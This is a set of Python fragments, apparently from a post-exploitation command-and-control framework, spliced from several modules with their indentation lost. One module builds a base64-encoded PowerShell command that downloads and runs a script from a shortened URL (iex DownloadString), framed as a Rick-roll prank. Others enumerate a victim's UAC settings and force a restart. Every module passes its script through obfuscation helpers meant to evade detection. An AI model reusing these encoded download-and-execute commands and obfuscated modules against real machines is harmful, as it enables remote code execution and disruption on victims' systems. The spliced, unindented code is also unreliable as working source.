# code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+b64DefaultResponse+'"')
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "' + str(b64DefaultResponse) + '"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
else:
print(helpers.color(
"[!] listeners/http_com generate_agent(): invalid language specification, only 'powershell' is currently supported for this module."))
def generate(self, obfuscate=False, obfuscationCommand=""):
# iex (New-Object Net.WebClient).DownloadString("http://bit.ly/e0Mw9w")
script = "$Null = Start-Process -WindowStyle Maximized -FilePath \"C:\Windows\System32\WindowsPowerShell\\v1.0\powershell.exe\" -ArgumentList \"-enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBpAHQALgBsAHkALwBlADAATQB3ADkAdwAiACkA\"; 'Client Rick-Asciied!'"
if obfuscate:
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
script = """
function Get-UACLevel
{
<#
.Synopsis
Enumerates the UAC Level
Author: Petr Medonos
.DESCRIPTION
Enumerates the UAC Level
.EXAMPLE
C:\> Get-UACLevel
#>
New-Variable -Name Key
New-Variable -Name PromptOnSecureDesktop_Name
New-Variable -Name ConsentPromptBehaviorAdmin_Name
$Key = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
$ConsentPromptBehaviorAdmin_Name = "ConsentPromptBehaviorAdmin"
$PromptOnSecureDesktop_Name = "PromptOnSecureDesktop"
$ConsentPromptBehaviorAdmin_Value = (Get-ItemProperty $Key $ConsentPromptBehaviorAdmin_Name).$ConsentPromptBehaviorAdmin_Name
$PromptOnSecureDesktop_Value = (Get-ItemProperty $Key $PromptOnSecureDesktop_Name).$PromptOnSecureDesktop_Name
If($ConsentPromptBehaviorAdmin_Value -Eq 0 -And $PromptOnSecureDesktop_Value -Eq 0){
"Never notify"
}
ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 5 -And $PromptOnSecureDesktop_Value -Eq 0){
"Notify me only when apps try to make changes to my computer (do not dim my desktop)"
}
ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 5 -And $PromptOnSecureDesktop_Value -Eq 1){
"Notify me only when apps try to make changes to my computer (default)"
}
ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 2 -And $PromptOnSecureDesktop_Value -Eq 1){
"Always notify"
}
Else{
"Unknown"
}
} Get-UACLevel"""
for option, values in self.options.items():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
script = "'Restarting computer';Restart-Computer -Force"
if obfuscate:
script = helpers.obfuscate(self.mainMenu.installPath,
psScript=script,
obfuscationCommand=obfuscationCommand)
script = helpers.keyword_obfuscation(script)
return script
